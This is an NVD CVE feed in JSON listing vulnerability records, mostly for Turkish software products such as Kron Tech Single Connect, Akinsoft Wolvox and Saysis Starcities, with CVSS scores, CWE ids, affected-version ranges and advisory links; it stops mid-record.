{"resultsPerPage":138,"startIndex":0,"totalResults":138,"format":"NVD_CVE","version":"2.0","timestamp":"2026-06-01T17:10:54.081","vulnerabilities":[{"cve":{"id":"CVE-2023-0882","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-02-17T10:15:11.297","lastModified":"2026-06-01T13:16:19.890","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Input Validation, Authorization Bypass Through User-Controlled Key vulnerability in Kron Tech Single Connect on Windows allows Privilege Abuse. This issue affects Single Connect: 2.16."},{"lang":"es","value":"La validación de entrada inadecuada y la omisión de autorización a través de una vulnerabilidad de clave controlada por el usuario en Single Connect de Kron Tech  en Windows permiten el abuso de privilegios. Este problema afecta a Single Connect: 2.16."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]},{"source":"nvd@nist.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:krontech:single_connect:*:*:*:*:*:*:*:*","versionEndExcluding":"2.16.1","matchCriteriaId":"82B73035-D846-45AA-8955-3407A5FE3255"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*","matchCriteriaId":"A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}],"references":[{"url":"https://docs.krontech.com/singleconnect-2-16/update-patch-rdp-proxy-idor-vulnerability","source":"iletisim@usom.gov.tr","tags":["Patch","Vendor Advisory"]},{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0092","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0092","source":"iletisim@usom.gov.tr","tags":["Broken Link"]},{"url":"https://docs.krontech.com/singleconnect-2-16/update-patch-rdp-proxy-idor-vulnerability","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Patch","Vendor Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0092","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Broken Link"]}]}},{"cve":{"id":"CVE-2023-0939","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-02-23T08:15:17.100","lastModified":"2026-06-01T13:16:20.037","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in NTN Information Technologies Online Services Software allows SQL Injection.\n\nThis issue affects Online Services Software: before 1.17."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:online_services_project:online_services:*:*:*:*:*:*:*:*","versionEndExcluding":"1.17","matchCriteriaId":"8683B937-5FE8-4AEF-8CA5-F873E36C4A22"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0103","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0103","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory","US Government Resource"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0103","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory","US Government Resource"]}]}},{"cve":{"id":"CVE-2023-1064","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-01T13:15:10.183","lastModified":"2026-06-01T13:16:20.917","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Uzay Baskul Weighbridge Automation Software allows SQL Injection.\n\nThis issue affects Weighbridge Automation Software: before 1.1."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:uzaybaskul:weighbridge_automation_software:*:*:*:*:*:*:*:*","versionEndExcluding":"1.1","matchCriteriaId":"87BABAD1-CF18-4A85-B2D4-DBF56D474FEE"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0115","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0115","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory","US Government Resource"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0115","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory","US Government Resource"]}]}},{"cve":{"id":"CVE-2023-1114","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-01T13:15:10.347","lastModified":"2026-06-01T13:16:21.160","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Missing Authorization vulnerability in Eskom e-Belediye allows Information Elicitation.\n\nThis issue affects e-Belediye: from 1.0.0.95 before 1.0.0.100."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]},{"source":"nvd@nist.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:eskom:e-belediye:*:*:*:*:*:*:*:*","versionStartIncluding":"1.0.0.95","versionEndExcluding":"1.0.0.100","matchCriteriaId":"B7C2EFBA-5833-4F6E-A69E-47B151BAC3E0"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0113-2","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0113-2","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory","US Government Resource"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0113-2","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory","US Government Resource"]}]}},{"cve":{"id":"CVE-2023-0577","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-03T07:15:08.650","lastModified":"2026-06-01T13:16:19.497","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ASOS Information Technologies SOBIAD allows Cross-Site Scripting (XSS).\n\nThis issue affects SOBIAD: before 23.02.01."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:asosegitim:sobiad:*:*:*:*:*:*:*:*","versionEndExcluding":"23.02.01","matchCriteriaId":"7B96153E-CE0F-4A39-86D3-4315D497B2D8"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0125","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0125","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0125","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-0578","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-03T07:15:09.053","lastModified":"2026-06-01T13:16:19.640","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ASOS Information Technologies Book Cites allows Cross-Site Scripting (XSS).\n\nThis issue affects Book Cites: before 23.01.05."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:asosegitim:bookcites:*:*:*:*:*:*:*:*","versionEndExcluding":"23.01.05","matchCriteriaId":"DB973A87-D95C-47CB-978C-5ADBE52C4AB4"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0125","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0125","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0125","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-0839","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-06T08:15:08.330","lastModified":"2026-06-01T13:16:19.750","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Protection for Outbound Error Messages and Alert Signals vulnerability in ProMIS Process Co. InSCADA allows Account Footprinting.\n\nThis issue affects inSCADA: before 20230115-1."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-1320"}]},{"source":"nvd@nist.gov","type":"Secondary","description":[{"lang":"en","value":"NVD-CWE-Other"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:inscada_project:inscada:*:*:*:*:*:*:*:*","versionEndExcluding":"20230115-1","matchCriteriaId":"3C8F91C8-9F7C-4EA4-ABA6-B603ED3BB904"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0127","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0127","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0127","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-0979","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-06T15:15:10.077","lastModified":"2026-06-01T13:16:20.160","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in MedData MedDataPACS allows SQL Injection.\n\nThis issue affects MedDataPACS : before 2023-03-03."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:meddatapacs:meddatapacs:*:*:*:*:*:*:*:*","versionEndExcluding":"2022-03-03","matchCriteriaId":"9A26D1D6-4728-42D9-9E70-1B6D12F608C3"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0129","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0129","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory","US Government Resource"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0129","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory","US Government Resource"]}]}},{"cve":{"id":"CVE-2023-1267","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-08T12:15:09.267","lastModified":"2026-06-01T13:16:22.203","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ulkem Company PtteM Kart.\n\nThis issue affects PtteM Kart: before 2.1."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:pttemkart:pttem_kart:*:*:*:*:*:*:*:*","versionEndExcluding":"2.1","matchCriteriaId":"482AB3A5-233C-422E-8F55-C1A5830A4710"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0133","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0133","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory","US Government Resource"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0133","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory","US Government Resource"]}]}},{"cve":{"id":"CVE-2023-1251","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-09T08:15:08.553","lastModified":"2026-06-01T13:16:22.060","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Akinsoft Wolvox. This issue affects Wolvox: before 8.02.03."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:akinsoft:wolvox:*:*:*:*:*:*:*:*","versionEndExcluding":"8.02.03","matchCriteriaId":"D94E3DDF-5087-4D22-BE44-71E3825ADC6A"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0136","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0136","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0136","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1091","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-10T08:15:09.610","lastModified":"2026-06-01T13:16:21.033","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Alpata Licensed Warehousing Automation System allows Command Line Execution through SQL Injection.\n\nThis issue affects Licensed Warehousing Automation System: through 2023.1.01."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:alpatateknoloji:licensed_warehousing_automation_system:*:*:*:*:*:*:*:*","versionEndIncluding":"2023.1.01","matchCriteriaId":"CC8AF88B-9181-49BD-9B41-DB1DFC170984"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0139","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0139","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0139","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1198","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-10T21:15:14.550","lastModified":"2026-06-01T13:16:21.740","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Saysis Starcities allows SQL Injection.\n\nThis issue affects Starcities: through 1.3."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:saysis:starcities:*:*:*:*:*:*:*:*","versionEndIncluding":"1.3","matchCriteriaId":"3FCCB7DB-20F6-4DB0-AF7A-C6A5A28C364E"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0140","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0140","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0140","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1246","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-10T21:15:14.737","lastModified":"2026-06-01T13:16:21.893","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Files or Directories Accessible to External Parties vulnerability in Saysis Starcities allows Collect Data from Common Resource Locations.\n\nThis issue affects Starcities: through 